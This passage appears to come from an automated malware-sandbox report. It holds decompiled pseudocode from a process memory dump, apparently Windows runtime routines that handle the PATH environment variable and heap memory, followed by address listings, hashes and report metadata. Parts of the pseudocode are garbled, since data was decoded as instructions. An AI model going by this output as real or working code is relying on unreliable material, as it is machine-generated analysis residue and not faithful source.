						_t329 = L01094620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t282;
							_t284 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t311 - 0x1168478;
								 *_t329 = ((0 | _t311 == 0x01168478) - 0x00000001 & 0xfffffffb) + 7;
								E010BF3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t339 = _t339 + 0xc;
								_t284 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t276 = E011039F2(_t324);
									_t311 = _v32;
									_t324 = _t276;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t286 = _t329 + _t284 * 4;
								_v56 = _t286;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t237 =  *(_v60 + _t295 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t286 =  *(_v60 + _t295 * 4);
										 *(_t286 + 0x18) = _t324;
										_t241 =  *(_v60 + _t295 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M010A2959))) {
												case 0:
													__ax =  *0x1168488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E010BF3E0(__edi,  *0x116848c, __ax & 0x0000ffff);
														__eax =  *0x1168488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E010BF3E0(_t324, _v80, _v64);
													_t271 = _v64;
													goto L26;
												case 2:
													 *0x1168480 & 0x0000ffff = E010BF3E0(__edi,  *0x1168484,  *0x1168480 & 0x0000ffff);
													__eax =  *0x1168480 & 0x0000ffff;
													__eax = ( *0x1168480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E010BF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E010BF3E0(_t324, _v76, _v36);
														_t271 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t324 = _t324 + (_t271 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t273);
													 *((short*)(_t324 - 2)) = _t273;
													goto L28;
												case 6:
													__ebx =  *0x116575c;
													__eflags = __ebx - 0x116575c;
													if(__ebx != 0x116575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E010BF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x116575c;
														} while (__ebx != 0x116575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1168478 & 0x0000ffff = E010BF3E0(__edi,  *0x116847c,  *0x1168478 & 0x0000ffff);
													__eax =  *0x1168478 & 0x0000ffff;
													__eax = ( *0x1168478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011039F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1166e58 & 0x0000ffff = E010BF3E0(__edi,  *0x1166e5c,  *0x1166e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1166e58 & 0x0000ffff;
													__eax = ( *0x1166e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t286 = _t286 + 4;
													__eflags = _t286;
													_v56 = _t286;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t322 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M010A2935))) {
							case 0:
								__ax =  *0x1168488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E010A2E3E(0,  &_v64);
								_t282 = _t282 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1168480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1168480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0108EEF0(0x11679a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0108EB70(__ecx, 0x11679a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1167b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01094620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0108EB70(__ecx, 0x11679a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t335;
										_pop(_t283);
										return E010BB640(_t216, _t283, _v8 ^ _t335, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t278 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t280 = E010A2E3E(_t278,  &_v36);
									_t291 = _v36;
									_v76 = _t280;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t282 = _t282 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x1165764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1168478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1168478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1166e58 & 0x0000ffff;
								__eax = ( *0x1166e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t296 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [edx], cl");
					asm("daa");
					_t245 = (_t241 |  *_t296) + _t339 |  *_t296 |  *[es:ecx];
					_t332 = _t329 + 1;
					 *_t311 =  *_t311 - _t296;
					 *0x1f010a26 =  *0x1f010a26 + _t245;
					_pop(_t287);
					_push(cs);
					 *((intOrPtr*)(_t245 +  &_a1530200326)) =  *((intOrPtr*)(_t245 +  &_a1530200326)) + _t311;
					_push(cs);
					 *_t311 =  *_t311 + _t245;
					 *_t311 =  *_t311 - _t296;
					 *((intOrPtr*)(_t245 - 0x9fef5d8)) =  *((intOrPtr*)(_t245 - 0x9fef5d8)) + _t245;
					asm("daa");
					_push(ds);
					 *_t311 =  *_t311 - _t296;
					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) + _t296;
					asm("daa");
					asm("fcomp dword [ebx+0xe]");
					 *((intOrPtr*)((_t245 |  *_t296 |  *_t296 |  *_t296) +  &_a1546912006)) =  *((intOrPtr*)((_t245 |  *_t296 |  *_t296 |  *_t296) +  &_a1546912006)) + _t332;
					_push(cs);
					_t341 = _t339 + _t296;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x114ff00);
					E010CD08C(_t287, _t324, _t332);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t251 = 0xc0000100;
					} else {
						_v8 = 0;
						_t333 = 0xc0000100;
						_v52 = 0xc0000100;
						_t253 = 4;
						while(1) {
							_v40 = _t253;
							__eflags = _t253;
							if(_t253 == 0) {
								break;
							}
							_t301 = _t253 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x1051664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t268 = E010BE5C0(_a8,  *((intOrPtr*)(_t301 + 0x1051668)), _t288);
									_t341 = _t341 + 0xc;
									__eflags = _t268;
									if(__eflags == 0) {
										_t333 = E010F51BE(_t288,  *((intOrPtr*)(_v48 + 0x105166c)), _a16, _t325, _t333, __eflags, _a20, _a24);
										_v52 = _t333;
										break;
									} else {
										_t253 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t253 = _t253 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t333;
						__eflags = _t333;
						if(_t333 < 0) {
							__eflags = _t333 - 0xc0000100;
							if(_t333 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t325;
									if( *_t297 == _t325) {
										_t333 = 0xc0000100;
										goto L76;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t255 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t255 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L106:
												_t333 = E010A2AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t333;
												__eflags = _t333 - 0xc0000100;
												if(_t333 != 0xc0000100) {
													goto L69;
												} else {
													_t325 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t258 = E01086600( *(_t313 + 0x1c));
												__eflags = _t258;
												if(_t258 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t333 = E010A2C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
											L76:
											_v32 = _t333;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0108EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t333 = _a24;
									_t265 = E010A2AE4( &_v36, _a8, _t288, _a16, _a20, _t333);
									_v32 = _t265;
									__eflags = _t265 - 0xc0000100;
									if(_t265 == 0xc0000100) {
										_v32 = E010A2C50(_v36, _a8, _t288, _a16, _a20, _t333, 1);
									}
									_v8 = _t325;
									E010A2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t251 = _t333;
					}
					L70:
					return E010CD0D1(_t251);
				}
				L108:
			}





















































                                                                            0x010a2584
                                                                            0x010a2586
                                                                            0x010a2590
                                                                            0x010a2596
                                                                            0x010a2597
                                                                            0x010a2598
                                                                            0x010a2599
                                                                            0x010a259e
                                                                            0x010a25a4
                                                                            0x010a25a9
                                                                            0x010a25ac
                                                                            0x010a25ae
                                                                            0x010a25b1
                                                                            0x010a25b2
                                                                            0x010a25b5
                                                                            0x010a25b8
                                                                            0x010a25bb
                                                                            0x010a25bc
                                                                            0x010a25bf
                                                                            0x010a25c2
                                                                            0x010a25c5
                                                                            0x010a25c6
                                                                            0x010a25cb
                                                                            0x010a25ce
                                                                            0x010a25d8
                                                                            0x010a25dd
                                                                            0x010a25de
                                                                            0x010a25e1
                                                                            0x010a25e3
                                                                            0x010a25e9
                                                                            0x010a26da
                                                                            0x010a26da
                                                                            0x010a26dd
                                                                            0x010a26e2
                                                                            0x010e5b56
                                                                            0x00000000
                                                                            0x010a26e8
                                                                            0x010a26f9
                                                                            0x010a26fb
                                                                            0x010a26fe
                                                                            0x010a2700
                                                                            0x010e5b60
                                                                            0x00000000
                                                                            0x010a2706
                                                                            0x010a2706
                                                                            0x010a270a
                                                                            0x010a270a
                                                                            0x010a270d
                                                                            0x010a2713
                                                                            0x010a2716
                                                                            0x010a2718
                                                                            0x010a271c
                                                                            0x010a271e
                                                                            0x010e5b6c
                                                                            0x010e5b6f
                                                                            0x010e5b7f
                                                                            0x010e5b89
                                                                            0x010e5b8e
                                                                            0x010e5b93
                                                                            0x010e5b96
                                                                            0x010e5b9c
                                                                            0x010e5ba0
                                                                            0x010e5ba3
                                                                            0x010e5bab
                                                                            0x010e5bb0
                                                                            0x010e5bb3
                                                                            0x010e5bb3
                                                                            0x010e5ba3
                                                                            0x010a2724
                                                                            0x010a2726
                                                                            0x010a2729
                                                                            0x010a272c
                                                                            0x010a279d
                                                                            0x010a279d
                                                                            0x010a27a0
                                                                            0x010a27a2
                                                                            0x00000000
                                                                            0x010a272e
                                                                            0x010a272e
                                                                            0x010a2731
                                                                            0x010a2734
                                                                            0x010a2734
                                                                            0x010a2736
                                                                            0x010e5bc1
                                                                            0x010e5bc1
                                                                            0x010e5bc4
                                                                            0x00000000
                                                                            0x010e5bca
                                                                            0x010e5bca
                                                                            0x010e5bcd
                                                                            0x00000000
                                                                            0x010e5bd3
                                                                            0x00000000
                                                                            0x010e5bd3
                                                                            0x010e5bcd
                                                                            0x010a273c
                                                                            0x010a273c
                                                                            0x010a2742
                                                                            0x010a2747
                                                                            0x010a274a
                                                                            0x010a274d
                                                                            0x010a2750
                                                                            0x00000000
                                                                            0x010a2756
                                                                            0x010a2756
                                                                            0x00000000
                                                                            0x010a2902
                                                                            0x010a2908
                                                                            0x010a290b
                                                                            0x00000000
                                                                            0x010a2911
                                                                            0x010a291c
                                                                            0x010a2921
                                                                            0x00000000
                                                                            0x010a2921
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2880
                                                                            0x010a2887
                                                                            0x010a288c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2805
                                                                            0x010a280a
                                                                            0x010a2814
                                                                            0x010a2816
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a281e
                                                                            0x010a2821
                                                                            0x010a2823
                                                                            0x00000000
                                                                            0x010a2829
                                                                            0x010a2829
                                                                            0x010a2831
                                                                            0x010a283c
                                                                            0x010a283e
                                                                            0x00000000
                                                                            0x010a283e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a284e
                                                                            0x010a2850
                                                                            0x010a2851
                                                                            0x010a2854
                                                                            0x010a2857
                                                                            0x010a285a
                                                                            0x010a285c
                                                                            0x010a285d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a275d
                                                                            0x010a2761
                                                                            0x00000000
                                                                            0x010a2767
                                                                            0x010a276e
                                                                            0x010a2773
                                                                            0x010a2773
                                                                            0x010a2776
                                                                            0x010a2778
                                                                            0x010a277e
                                                                            0x010a277e
                                                                            0x010a2781
                                                                            0x010a2781
                                                                            0x010a2783
                                                                            0x010a2784
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5bd8
                                                                            0x010e5bde
                                                                            0x010e5be4
                                                                            0x010e5be6
                                                                            0x010e5be8
                                                                            0x010e5be9
                                                                            0x010e5bee
                                                                            0x010e5bf8
                                                                            0x010e5bff
                                                                            0x010e5c01
                                                                            0x010e5c04
                                                                            0x010e5c07
                                                                            0x010e5c0b
                                                                            0x010e5c0d
                                                                            0x010e5c0d
                                                                            0x010e5c15
                                                                            0x010e5c18
                                                                            0x010e5c1b
                                                                            0x010e5c1b
                                                                            0x010e5c1e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a28c3
                                                                            0x010a28c8
                                                                            0x010a28d2
                                                                            0x010a28d4
                                                                            0x010a28d8
                                                                            0x010a28db
                                                                            0x010e5c26
                                                                            0x010e5c28
                                                                            0x010e5c2d
                                                                            0x010e5c2d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5c34
                                                                            0x010e5c36
                                                                            0x010e5c49
                                                                            0x010e5c4e
                                                                            0x010e5c54
                                                                            0x010e5c5b
                                                                            0x010e5c5d
                                                                            0x010e5c60
                                                                            0x010a2788
                                                                            0x010a2788
                                                                            0x010a278b
                                                                            0x010a278e
                                                                            0x010a278e
                                                                            0x010a278e
                                                                            0x010a2791
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2756
                                                                            0x010a2750
                                                                            0x00000000
                                                                            0x010a2794
                                                                            0x010a2794
                                                                            0x010a2795
                                                                            0x010a2798
                                                                            0x010a2798
                                                                            0x00000000
                                                                            0x010a2734
                                                                            0x010a272c
                                                                            0x010a2700
                                                                            0x010a25ef
                                                                            0x010a25ef
                                                                            0x010a25ef
                                                                            0x010a25f2
                                                                            0x010a25f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a25fe
                                                                            0x00000000
                                                                            0x010a28e6
                                                                            0x010a28ec
                                                                            0x010a28ef
                                                                            0x010a28f5
                                                                            0x010a28f8
                                                                            0x010a28f8
                                                                            0x00000000
                                                                            0x010a28f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2866
                                                                            0x010a2866
                                                                            0x010a2876
                                                                            0x010a2879
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a27e0
                                                                            0x010a27e7
                                                                            0x010a27e9
                                                                            0x010a27eb
                                                                            0x010e5afd
                                                                            0x00000000
                                                                            0x010e5afd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2633
                                                                            0x010a2638
                                                                            0x010a263b
                                                                            0x010a263c
                                                                            0x010a263e
                                                                            0x010a2640
                                                                            0x010a2642
                                                                            0x010a2647
                                                                            0x010a2649
                                                                            0x010a264e
                                                                            0x010a2650
                                                                            0x010a2653
                                                                            0x010a2659
                                                                            0x010a26a2
                                                                            0x010a26a7
                                                                            0x010a26ac
                                                                            0x010a26b2
                                                                            0x010e5b11
                                                                            0x010e5b15
                                                                            0x010e5b17
                                                                            0x00000000
                                                                            0x010a26b8
                                                                            0x010a26b8
                                                                            0x010a26ba
                                                                            0x010a27a6
                                                                            0x010a27a6
                                                                            0x010a27a9
                                                                            0x010a27ab
                                                                            0x010a27b9
                                                                            0x010a27b9
                                                                            0x010a27be
                                                                            0x010a27c1
                                                                            0x010a27c3
                                                                            0x010a27c5
                                                                            0x010a27c7
                                                                            0x010e5c74
                                                                            0x010e5c79
                                                                            0x010e5c79
                                                                            0x010a27c7
                                                                            0x00000000
                                                                            0x010a26c0
                                                                            0x010a26c0
                                                                            0x010a26c3
                                                                            0x010a26c6
                                                                            0x010a26c6
                                                                            0x010a26c9
                                                                            0x010a26c9
                                                                            0x00000000
                                                                            0x010a26c9
                                                                            0x010a26ba
                                                                            0x010a265b
                                                                            0x010a265b
                                                                            0x010a265e
                                                                            0x010a2667
                                                                            0x010a266d
                                                                            0x010a2677
                                                                            0x010a267c
                                                                            0x010a267f
                                                                            0x010a2681
                                                                            0x010e5b49
                                                                            0x010e5b4e
                                                                            0x010a27cd
                                                                            0x010a27d0
                                                                            0x010a27d1
                                                                            0x010a27d2
                                                                            0x010a27d4
                                                                            0x010a27dd
                                                                            0x010a2687
                                                                            0x010a2687
                                                                            0x010a268a
                                                                            0x010a268b
                                                                            0x010a268e
                                                                            0x010a268f
                                                                            0x010a2691
                                                                            0x010a2696
                                                                            0x010a2698
                                                                            0x010a269d
                                                                            0x010a269f
                                                                            0x00000000
                                                                            0x010a269f
                                                                            0x010a2681
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2846
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2605
                                                                            0x010a260a
                                                                            0x010a260c
                                                                            0x010a2611
                                                                            0x010a2616
                                                                            0x010a2619
                                                                            0x010a2619
                                                                            0x010a261e
                                                                            0x00000000
                                                                            0x010a2624
                                                                            0x010a2627
                                                                            0x010a2627
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5b1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2894
                                                                            0x010a289b
                                                                            0x010a289d
                                                                            0x010a28a1
                                                                            0x010e5b2b
                                                                            0x010e5b2e
                                                                            0x010e5b2e
                                                                            0x010a28a7
                                                                            0x010a28a9
                                                                            0x010e5b04
                                                                            0x010e5b09
                                                                            0x010e5b09
                                                                            0x010e5b09
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5b35
                                                                            0x010e5b3c
                                                                            0x010a28fb
                                                                            0x010a28fb
                                                                            0x010a26cc
                                                                            0x010a26cc
                                                                            0x010a26d0
                                                                            0x00000000
                                                                            0x010a26d2
                                                                            0x010a26d2
                                                                            0x00000000
                                                                            0x010a26d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a25fe
                                                                            0x010a292d
                                                                            0x010a292f
                                                                            0x010a2930
                                                                            0x010a2935
                                                                            0x010a2939
                                                                            0x010a293e
                                                                            0x010a2941
                                                                            0x010a2945
                                                                            0x010a2946
                                                                            0x010a2948
                                                                            0x010a294e
                                                                            0x010a294f
                                                                            0x010a2950
                                                                            0x010a2957
                                                                            0x010a2958
                                                                            0x010a295a
                                                                            0x010a295c
                                                                            0x010a2962
                                                                            0x010a2965
                                                                            0x010a2966
                                                                            0x010a2968
                                                                            0x010a296e
                                                                            0x010a2971
                                                                            0x010a2974
                                                                            0x010a297b
                                                                            0x010a297c
                                                                            0x010a297e
                                                                            0x010a297f
                                                                            0x010a2980
                                                                            0x010a2981
                                                                            0x010a2982
                                                                            0x010a2983
                                                                            0x010a2984
                                                                            0x010a2985
                                                                            0x010a2986
                                                                            0x010a2987
                                                                            0x010a2988
                                                                            0x010a2989
                                                                            0x010a298a
                                                                            0x010a298b
                                                                            0x010a298c
                                                                            0x010a298d
                                                                            0x010a298e
                                                                            0x010a298f
                                                                            0x010a2990
                                                                            0x010a2992
                                                                            0x010a2997
                                                                            0x010a29a3
                                                                            0x010a29a6
                                                                            0x010a29ab
                                                                            0x010a29ad
                                                                            0x010a29b0
                                                                            0x010a29b2
                                                                            0x010e5c80
                                                                            0x010a29b8
                                                                            0x010a29b8
                                                                            0x010a29bb
                                                                            0x010a29c0
                                                                            0x010a29c5
                                                                            0x010a29c6
                                                                            0x010a29c6
                                                                            0x010a29c9
                                                                            0x010a29cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a29cd
                                                                            0x010a29d0
                                                                            0x010a29d9
                                                                            0x010a29db
                                                                            0x010a29dd
                                                                            0x010a2a7f
                                                                            0x010a2a84
                                                                            0x010a2a87
                                                                            0x010a2a89
                                                                            0x010e5ca1
                                                                            0x010e5ca3
                                                                            0x00000000
                                                                            0x010a2a8f
                                                                            0x010a2a8f
                                                                            0x00000000
                                                                            0x010a2a8f
                                                                            0x00000000
                                                                            0x010a29e3
                                                                            0x010a29e3
                                                                            0x010a29e3
                                                                            0x00000000
                                                                            0x010a29e3
                                                                            0x010a29dd
                                                                            0x00000000
                                                                            0x010a29db
                                                                            0x010a29e6
                                                                            0x010a29e9
                                                                            0x010a29eb
                                                                            0x010a29ed
                                                                            0x010a29f3
                                                                            0x010a29f5
                                                                            0x010a29f8
                                                                            0x010a29fa
                                                                            0x010a2a97
                                                                            0x010a2a9a
                                                                            0x010a2a9d
                                                                            0x010a2add
                                                                            0x00000000
                                                                            0x010a2a9f
                                                                            0x010a2aa2
                                                                            0x010a2aa5
                                                                            0x010a2aa8
                                                                            0x010a2aab
                                                                            0x010e5cab
                                                                            0x010e5caf
                                                                            0x010e5cc5
                                                                            0x010e5cda
                                                                            0x010e5cdc
                                                                            0x010e5cdf
                                                                            0x010e5ce5
                                                                            0x00000000
                                                                            0x010e5ceb
                                                                            0x010e5ced
                                                                            0x010e5cee
                                                                            0x00000000
                                                                            0x010e5cee
                                                                            0x010e5cb1
                                                                            0x010e5cb4
                                                                            0x010e5cb9
                                                                            0x010e5cbb
                                                                            0x00000000
                                                                            0x010e5cbd
                                                                            0x010e5cbd
                                                                            0x00000000
                                                                            0x010e5cbd
                                                                            0x010e5cbb
                                                                            0x010a2ab1
                                                                            0x010a2ab1
                                                                            0x010a2ac4
                                                                            0x010a2ac6
                                                                            0x010a2ac6
                                                                            0x00000000
                                                                            0x010a2ac6
                                                                            0x010a2aab
                                                                            0x00000000
                                                                            0x010a2a00
                                                                            0x010a2a09
                                                                            0x010a2a0e
                                                                            0x010a2a21
                                                                            0x010a2a24
                                                                            0x010a2a35
                                                                            0x010a2a3a
                                                                            0x010a2a3d
                                                                            0x010a2a42
                                                                            0x010a2a59
                                                                            0x010a2a59
                                                                            0x010a2a5c
                                                                            0x010a2a5f
                                                                            0x010a2a5f
                                                                            0x010a29fa
                                                                            0x010a29f3
                                                                            0x010a2a64
                                                                            0x010a2a64
                                                                            0x010a2a6b
                                                                            0x010a2a6b
                                                                            0x010a2a6d
                                                                            0x010a2a72
                                                                            0x010a2a72
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PATH
                                                                            • API String ID: 0-1036084923
                                                                            • Opcode ID: 4652b7afc985eb4b1793b1b1f0d6c7cd937ab6368d5223372e7b296f65bf15f0
                                                                            • Instruction ID: c1ed6385f3f01c98cc471561f4f8c98242fceabbb00de5e019d8c62c2975f7a3
                                                                            • Opcode Fuzzy Hash: 4652b7afc985eb4b1793b1b1f0d6c7cd937ab6368d5223372e7b296f65bf15f0
                                                                            • Instruction Fuzzy Hash: 54C1BEB1E11219DFDB25DF99D880BEEBBF5FF48740F844069E981AB250E734A941CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010AFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 80%
                                                                            			E010AFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
